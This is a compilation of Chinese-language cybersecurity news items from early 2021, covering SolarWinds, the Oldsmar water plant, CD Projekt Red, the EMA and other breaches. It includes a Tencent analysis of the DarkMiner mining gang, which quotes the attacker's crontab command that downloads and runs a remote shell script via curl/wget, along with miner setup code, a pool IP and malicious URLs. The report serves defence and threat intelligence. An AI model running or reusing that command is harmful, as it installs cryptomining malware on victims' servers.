据外媒CNET报道，美众议院国土安全委员会和监督与改革委员会于当地时间周一宣布，他们将于本周就SolarWinds遭黑客攻击一事举行听证会。在2月26日的听证会上，SolarWinds CEO Sudhakar Ramakrishna、前SolarWinds CEO Kevin Thompson、微软总裁布拉德·史密斯和FireEye CEO Kevin Mandia都将出庭作证。 听证会将对私营公司在预防、调查和补救影响政府并对国家安全造成损害的网络攻击方面的作用展开调查。 此前，美情报机构曾在1月初将发生在去年的SolarWinds黑客事件归咎于俄罗斯。 据悉，该黑客攻击始于2020年3月左右，当时黑客侵入了总部位于德克萨斯州的SolarWinds的IT管理软件。黑客在SolarWinds的软件更新中植入了恶意代码，该公司约1.8万名私人和公共部门客户安装了受病毒感染的更新。 据报道，此次入侵包括美财政部高层使用的电子邮件系统。相关政府官员已经证实，美国财政部、能源部和商务部都遭遇了黑客入侵。据报道，此次黑客攻击的目标还波及到美国土安全部、五角大楼、国务院、国家卫生研究院和国家核安全局。 这场名为Weathering the Storm: The Role of Private Tech in the SolarWinds Breach and Ongoing Campaign的听证会将于美国东部时间2月26日上午9点开始。         （消息及封面来源：cnBeta）

据《华盛顿邮报》周二报道，SolarWinds黑客或已入侵美国宇航局（NASA）和美国联邦航空管理局（FAA）的网络，这是针对美国政府机构和私营公司的更广泛的间谍活动的一部分。这是在参议院情报委员会举行听证会前几个小时发生的，该委员会的任务是调查这次广泛的网络攻击。美国政府此前表示，这次攻击“很可能源自俄罗斯”。 NASA发言人没有对该报道提出异议，但以 “正在进行的调查”为由拒绝发表评论。FAA的发言人没有回应置评请求。 据悉，NASA和FAA是被证实受到攻击的9个政府机构中剩下的两个未命名的机构。其他七家包括商务部、能源部、国土安全部、司法部和国务院、财政部和国家卫生研究院，不过据信攻击者并没有入侵他们的机密网络。FireEye、微软和Malwarebytes等多家网络安全公司也在攻击中被攻破。 据报道，拜登政府正在准备对俄罗斯进行制裁，很大程度上是因为黑客攻击活动，《华盛顿邮报》也报道了这一消息。 去年，FireEye在自己的网络被攻破后，对黑客活动发出警报后，发现了这些攻击。每个受害者都是美国软件公司SolarWinds的客户，该公司的网络管理工具被联邦政府和财富500强企业广泛使用。黑客入侵SolarWinds的网络，在其软件中植入后门，并将后门与受污染的软件更新推送到客户网络中。 这不是唯一的入侵方式。据称，黑客还瞄准了其他公司，侵入受害者网络上的其他设备和电器，以及瞄准微软厂商，入侵其他客户的网络。 上周，上个月被提拔到白宫国家安全委员会，担任负责网络和新兴技术的副国家安全顾问的前国家安全局网络安全主管安妮·诺伊伯格表示，这次攻击花了 “几个月的时间来计划和执行”，“我们需要一些时间来逐层揭开这个真相”。         （消息及封面来源：cnBeta）

CD Projekt Red是一家电子游戏开发商，其代表作品是2020年争议巨大的电子游戏之一《赛博朋克2077》。那款游戏非常令人期待，但推出后却出现了巨大的问题，以至于变成了其开发商的累赘，并激怒了全球等待多年才能玩到这款游戏的玩家。该公司不久前宣布，黑客进入了其服务器，并窃取了网上泄露的游戏数据。 正如你所预料的那样，已经有一些用户通过Twitter和其他社交网络链接到这些被盗数据。据报道，CD Projekt Red一直在使用DMCA的移除请求来消除链接到该被盗数据的推文甚至账户。报道指出，上周四，至少有两名Twitter用户通过一家版权监测公司的电子邮件收到了DMCA移除请求的通知。 报道指出，邮件中列出了对侵权行为的描述，包括链接到非法获取源代码的《Gwent: The Witcher Card Game》的源代码，公司认为他说，该链接导致了一个便利的入口，让其他人下载源代码。 DMCA取缔通知的目标还有至少其他三个Twitter用户。他们的推文被一条标准的Twitter DMCA提示消息所取代，指出内容已被删除，以回应版权持有人的报告。CD Projekt Red上周宣布被黑客攻击，并发布了一张黑客要求的赎金截图。 游戏开发商拒绝与黑客合作，也没有支付赎金。据报道，黑客正试图出售他们在攻击中获得的其他数据。         （消息及封面来源：cnBeta）

《坦帕湾时报》报道称，有黑客成功渗透了控制佛罗里达州奥尔德斯马市水处理设施的计算机系统。通过篡改可远程控制的计算机数据，攻击者改变了当地供水中的化学品含量（上调了氢氧化钠碱液的水平）。庆幸的是，设施管理者和警方均表示，目前暂无居民受到伤害的报告。 视频截图（来自：Pinellas Sheriff / YouTube） 据悉，如果人们接触了少量的氢氧化钠，或导致严重的皮肤灼伤和眼睛伤害。一些城市之所以在供水中添加少量 NaOH 碱液，主要是为了防止管道腐蚀和提升 pH 值。 皮内拉斯县（Pinellas County）治安官 Bob Gualtieri 在周一的新闻发布会上表示，本次事件并未造成明显不利的影响。更重要的是，公众从未处于任何危险之中。 即便如此，意图不明的攻击者将黑手伸向公共基础设施一事，还是引发了许多居民的恐慌情绪。目前当地正在与联邦调查局（FBI）和特勤局（Secret Service）联手展开调查，附近城镇也受到有关潜在威胁的警报。 需要指出的是，佛罗里达州奥尔德斯马市（Oldsmar）发生的事件并非孤例。去年 11 月的时候，伊利诺伊州的一家水务公司也被疑似与俄方有关的攻击者给盯上。 此外据《华盛顿邮报》报道，以色列情报官员声称去年发生了一起未遂的网络攻击事件，指责伊朗方面试图对该国的水处理设施展开攻击。 路透社报道了 TeamViewer 远程访问软件的使用（图自：AphaPublications.org） 《坦帕湾时报》描述称，奥尔德斯玛市水处理设施的一位远程操作员发现，在自己没有接触的情况下，鼠标指针也开始在屏幕上移动。 其于周五上午大约 8 点查看了监测系统，并留意到有人短暂地访问了该系统。但由于上司也会定期通过远程连接访问该系统，大家一开始也没有放在心上。 不过当天下午 1 点半左右，有人再次远程访问了系统，这次操作员终于可以确定异常。攻击者操控了鼠标，将指针挪到了控制水处理的软件上，并展开了持续 3~5 分钟的操作。 结果就是，系统的氢氧化钠水平从 100 ppm 暴增到了 11100 ppm 。庆幸的是，在攻击者下线后，操作员立即将浓度改回了正常的 100 ppm 。 视频链接：https://tv.sohu.com/v/dXMvODIyMjQwNTMvMjM4NTU5MzEyLnNodG1s.html 警长办公室的 Jessica Mackesy 在一封邮件中称，当地水处理设施使用了常见的 TeamViewer 远程访问软件。 此外除了系统中的冗余设定，当地还有其它一些保障措施来缓解受此事件影响的 1.5 万居民的日常用水。   （消息及封面来源：cnBeta）

一、概述 腾讯云防火墙捕获一黑客团伙利用Jenkins未授权访问漏洞针对云服务器的攻击，若攻击者利用漏洞攻击得手，就会通过CURL命令下载shell脚本执行，并继续通过脚本部署挖矿木马。腾讯云防火墙成功拦截了这些攻击，遭遇攻击的主机未受损失。 通过分析腾讯云防火墙拦截到的黑客攻击指令，发现攻击者在部署挖矿程序的过程中，会修改系统最大内存页，以达到系统资源的充分利用，并且会多次检测挖矿进程的状态，从而对挖矿程序进行保活操作。 因其该团伙使用的挖矿账名为syndarksonig@gmail.com，腾讯威胁情报中心将该挖矿木马命名为DarkMiner。根据该挖矿团伙使用的挖矿钱包算力估算，该团伙控制了约3000台服务器挖矿。 腾讯安全专家建议政企用户按照以下步骤自查是否遭遇类似攻击： 检查服务器是否部署Jenkins组件，如有部署，应继续检查是否配置复杂密码。配置弱密码的系统极易被入侵； 检查服务器是否访问矿池：142.44.242.100； 检查服务器是否存在恶意文件：/tmp/ .admin_thread，如有及时kill进程并删除相关文件。 腾讯安全响应清单 腾讯安全系列产品已针对DarkMiner黑产团伙进行升级响应，具体清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）DarkMiner团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）DarkMiner团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）已支持识别检测DarkMiner团伙关联的IOCs； 2）已支持检测和拦截Jenkins未授权命令执行漏洞利用攻击 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀DarkMiner团伙相关木马程序； 2）已支持检测Jenkins未授权命令执行漏洞； 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持识别检测DarkMiner团伙关联的IOCs； 2）已支持检测Jenkins未授权命令执行漏洞利用攻击； 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta   二、详细分析 Jenkins是一个知名的独立开源软件项目，是基于Java开发的一种持续集成工具，用于监控持续重复的工作，该项目提供了一个开放易用的软件平台，使软件的持续集成变成可能。如果用户在使用jenkins 时未设置帐号密码，或者使用了弱帐号密码，可能导致未授权访问攻击。 如果用户未设置密码，会导致系统存在Jakins存在未授权访问漏洞。 黑客在未授权的情况下访问jenkins系统，并通过系统管理中的“脚本命令行”功能执行了恶意脚本。 腾讯云防火墙捕获到黑客利用Jenkins未授权访问漏洞利用进行攻击的日志。 此次攻击执行恶意命令为： 'sh','-c','crontab -r; echo "* * * * * curl http[:]//37.49.230.155/manager.sh | sh; wget -O- http[:]//37.49.230.155/manager.sh | sh" | crontab -' 接着脚本manager.sh执行挖矿木马下载和启动。 首先根据CPU支持的线程数量设置最大内存页，以达到CPU资源利用最大化： SYSTEM_ADMIN_RENAME=".admin_thread"THREAD_COUNT=$(cat /proc/cpuinfo | grep model | grep name | wc -l) #sysctl -w vm.nr_hugepages=$THREAD_COUNT_MBbash -c "echo vm.nr_hugepages=$(($THREAD_COUNT * 1000)) >> /etc/sysctl.conf"#bash -c "echo vm.nr_hugepages=$THREAD_COUNT >> /etc/sysctl.conf" echo "Threads: $THREAD_COUNT, Threads in MB: $(($THREAD_COUNT * 1000))" sysctl -w vm.nr_hugepages=$(($THREAD_COUNT * 1000)) && echo "SET hugepage $(($THREAD_COUNT * 1000))" #|| \#sysctl -w vm.nr_hugepages=$THREAD_COUNT && echo "SET hugepage $THREAD_COUNT" for i in $(find /sys/devices/system/node/node* -maxdepth 0 -type d); do       echo 3 > "$i/hugepages/hugepages-1048576kB/nr_hugepages"; done echo "1GB pages successfully enabled" 然后通过cat /proc/cpuinfo命令获取CPU类型，并判断是否属于支持的类型。 进入TMP目录下，判断挖矿进程是否已经在运行中。 for path in $TMP_DIR do   >$path/.f && cd $path && rm .f done (ps -x | grep -e "$SYSTEM_ADMIN_RENAME" | grep -v grep) > /dev/null 2>&1 如果没有在运行中，则下载xmrig挖矿木马到/tmp/ .admin_thread，伪装成系统管理进程“System manager”，然后启动挖矿程序。 挖矿使用矿池：142.44.242.100:14444 钱包： 25WSQDugR4bMr9KTsyuiWQawTpaavoxF9pNujecKTpr5MKKUvUyPyL9ZMXq9woLwiVkzcJgkhF39NdENkmEREVLM2ZoqAB 根据该钱包的平均算力40KH/s推算，共有3000台左右服务器被攻陷并植入挖矿木马。 并且该木马会多次检测挖矿进程运行状态，发现失活就重复挖矿程序部署过程，使用多个旷工名连接矿池进行挖矿，其中挖矿子账号名均为syndarksonig@gmail.com。 DarkMiner团伙使用的旷工名 small big xm4868 jenkin jenkin xm14856 mac server xm18614 focal xm959 xm22649 macmac xm1600 xm29274 xmrig worker28467 xm13222 stak xm7381 xmrig29684   IOCs URL http[:]//37.49.230.155/bot.arm5 http[:]//37.49.230.155/system_manager.sh http[:]//37.49.230.155/ssh.sh http[:]//37.49.230.155/manager.sh http[:]//37.49.230.155/xmrig http[:]//37.49.230.155/xmrig1 http[:]//37.49.230.155/xmrig2 http[:]//37.49.230.155/xmrig3 http[:]//37.49.230.155/xmrig4 http[:]//37.49.230.155/xmrig5 MD5 manager.sh f8631ea3001a1ee82b6ba4b96cc6b26f 钱包： 425WSQDugR4bMr9KTsyuiWQawTpaavoxF9pNujecKTpr5MKKUvUyPyL9ZMXq9woLwiVkzcJgkhF39NdENkmEREVLM2ZoqAB

2021 年 1 月 20 日，微软发布了针对 SolarWinds 入侵事件的又一份深度调查报告，并且指出幕后攻击者有着极其高超的黑客技巧和娴熟度。在去年的攻击中，SolarWinds 因 Orion IT 管理软件的封包服务器被恶意软件感染，导致包括微软在内的数以万计的客户，在部署更新后受到了不同程度的影响。 在这篇报告中，微软主要深入探讨了攻击者是如何逃避检测、并通过企业内网进行静默传播的。 “首先，在每台机器上的 Cobalt Strike 动态链接库（DLL）植入都是唯一的，以避免恶意软件自身被筛查到任何重复的痕迹。 其次，攻击者重用了文件、文件夹、导出功能的名称，辅以 C2 域名 / IP、HTTP 请求、时间戳、文件元数据、配置、以及运行子进程。” 如此极端的差异化，同样出现在了不可执行的部分，比如 WMI 过滤查询和持久性过滤器的名称、用于 7-zip 压缩包的文档密码、以及输出日志文件的名称。 想要对每台受感染的计算机执行如此细致筛查，显然是一项让人难以置信的艰苦工作。但攻击者就是通过这样的手段，在很长一段时间内躲过了安全防护系统的检测。 此外攻击者不仅勤奋，还显得相当具有耐心。比如为了避免被检测到，它还会首先枚举目标计算机上运行的远程进程和服务。 接着通过编辑目标计算机的注册表，以禁用特定安全服务进程的自动启动。在切实的攻击发起之前，恶意软件会非常耐心地等待计算机重新启动。 最后，微软指出了 Solorigate 攻击者的其它聪明之处，比如仅在工作时间段内对系统发起攻击，因为此时发生的正常活动会掩盖他们的真实目的。 结合复杂的攻击链和旷日持久的操作，安全防护系统也必须在持续数月的时间里、对攻击者的跨域活动有着全面的了解，辅以历史数据和强大的分析工具，才能尽早地对异常状况展开调查。           （消息来源：cnBeta；封面源自网络）

欧洲药品管理局(EMA)周二宣布，黑客泄露了去年年底发现的网络入侵行为中被盗的COVID-19疫苗信息。”正在进行的对EMA的网络攻击的调查显示，一些与COVID-19药品和属于第三方的疫苗有关的非法访问文件已经在互联网上泄露，”EMA在一份声明中报道。”执法部门正在采取必要的行动。” 最新情况是在辉瑞-BioNTech以及Moderna都表示，EMA已经通知这些公司，一些评估文件在对该机构的网络攻击中被获取。这次网络攻击发生在这两家公司向EMA提交了各自的COVID-19疫苗并要求批准在欧盟成员国紧急使用之后。 EMA总部设在阿姆斯特丹，是欧盟的一个主管卫生健康的机构，负责监督和评估人类和动物使用各种药品的情况。EMA于12月批准了辉瑞公司和BioNTech公司的疫苗，并在本月早些时候批准了Moderna COVID-19疫苗。 “该机构继续全力支持对数据泄露事件的刑事调查，并通知任何其他实体和个人，他们的文件和个人数据可能已经受到未经授权的访问，”该机构周二写道。 “该机构和欧洲药品监管网络仍在充分运作，与COVID-19药品和疫苗的评估和批准相关的时间表不受影响，”EMA指出。 EMA远不是COVID-19大流行期间第一个被黑客攻击的政府机构。世界卫生组织和美国卫生与人类服务部去年都是网络攻击的受害者，同时美国和世界各地的医院也成为勒索软件攻击的受害者，在某些情况下对服务产生了负面影响。         （消息及封面来源：cnBeta）

在对 SolarWinds 事件的深入调查中，微软发现部分内部帐号被黑客获取，并访问了公司的部分源代码。而现在，有一名黑客以 60 万美元的价格出售 Windows 10 源代码，但是无法确定真实性。 来自 Rendition Infosec 的安全研究人员 Jake Williams 报道了这一消息，他警告称这些黑客似乎来自俄罗斯知名黑客组织 Shadow Brokers。但他们可能是为了混淆视听，并非真正有这些源代码访问。 微软证实，黑客能够查看，但不能改变部分产品的源代码，并表示没有证据表明这一活动将微软服务的安全性或任何客户数据置于风险之中。微软表示，查看源代码并不会增加风险，因为该公司并不依赖源代码的保密性来保证产品的安全。         （消息来源：cnBeta；封面来自网络）

一名黑客控制了连接到互联网的智能情趣用品：男性远程贞操笼，并要求用比特币支付赎金来解锁。“你的丁丁已经被我锁定。”根据一名安全研究人员获得的对话截图，黑客对其中一名受害者说。这位研究人员的名字叫Smelly，是收集恶意软件样本的网站vx-underground的创始人。 去年10月，安全研究人员发现，一款物联网情趣用品贞操笼，一种主要在BDSM社区中使用的放置并锁定在阴茎周围并可以联网远程上锁和解锁的性玩具制造商留下了一个API暴露，给了恶意黑客控制设备的机会。根据一位安全研究人员获得的黑客和几位受害者之间的对话截图，非常糟糕的事情就这样发生了。 不过万幸的是，”这件事发生的时候，我并没有锁上这个东西。”Robert在一次在线聊天中说，不然后果真的不堪设想。 受害者Robert表示，他收到了黑客的信息，要求支付0.02比特币（约合今天750美元）来解锁设备。他意识到自己的笼子肯定被 “锁住了”以至于无法使用。 “我现在已经不是笼子的主人了，所以我在任何时候都不能完全控制笼子。”另一位名叫RJ的受害者在一次在线聊天中表示。他收到了黑客发来的信息，黑客说他们已经控制了笼子，并希望支付一笔钱来解锁笼子。 这些黑客再次表明，仅仅因为你可以将某样东西连接到互联网上，并不意味着你必须这样做，尤其是如果你随后不注意保护设备或其连接的安全。 这款设备的中国制造商Qiui没有回应置评请求，这款设备的名字很贴切，叫做Cellmate。 对Cellmate设备进行安全查验的Pentest Partners安全研究员亚历克斯-洛马斯(Alex Lomas)证实，一些用户确实收到了勒索信息，并表示这凸显了这些设备制造商改进安全实践的必要性。           （消息及封面来源：cnBeta）

据外媒报道，新西兰央行周日表示，该行的一个数据系统已被一名身份不明的黑客入侵，该黑客有可能已经获取商业和个人敏感信息。这家总部位于惠灵顿的银行在一份声明中说，新西兰储备银行用于共享和存储敏感信息的第三方文件共享服务已被非法访问。 行长Adrian Orr表示，漏洞已经得到控制。该银行的核心功能 “仍然健全和运作。”Orr表示：“我们正在与国内和国际网络安全专家和其他相关部门密切合作，作为我们调查和应对这次恶意攻击的一部分。” “潜在被访问的信息的性质和范围仍在确定中，但可能包括一些商业和个人敏感信息，”Orr补充道。 在银行完成初步调查之前，该系统已经被保护并下线。“了解此次数据泄露事件的全部影响需要时间，我们正在与信息可能被访问的系统用户合作，”Orr说。 该银行拒绝回答寻求更多细节的电子邮件问题。目前还不清楚黑客入侵事件发生的时间，也不清楚是否有任何迹象表明谁是责任人，以及文件共享服务是在哪个国家。 在过去的一年里，新西兰的几个主要机构都成为了网络干扰的目标，其中包括新西兰证券交易所，该交易所的服务器在8月份遭网络黑客攻击，连续崩溃近一周时间。 奥克兰大学计算机科学教授Dave Parry告诉新西兰电台，银行数据泄露事件背后的“罪魁祸首”很可能是另一个政府。“最终如果你是从一种类似于犯罪的角度来的，政府机构是不会支付你的赎金或其他什么的，所以你更感兴趣的可能是从政府对政府的层面来的，”Parry说。           （消息来源：cnBeta；封面来自网络）